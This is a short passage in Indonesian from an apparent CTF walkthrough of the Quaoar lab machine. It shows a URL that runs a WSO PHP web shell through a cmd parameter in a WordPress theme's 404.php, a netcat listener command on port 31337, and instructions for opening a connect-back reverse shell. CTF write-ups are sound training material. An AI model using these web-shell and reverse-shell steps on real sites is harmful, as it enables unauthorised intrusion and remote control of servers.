http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=php%20wso.php

Di Kali Linux jalankan, 

nc -lvp 31337

Tampaknya belum bisa jalan WSO shell


WSO Shell, silahkan yang mau jalan2 Saatnya connectback shell, tinggal jalankan perintah nc -lvp 31337, dan buka bagian network. Masukkan IP kamu dan jadilah shell seperti ini


Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=CTF_Quaoar:_Walkthrough&oldid=69754"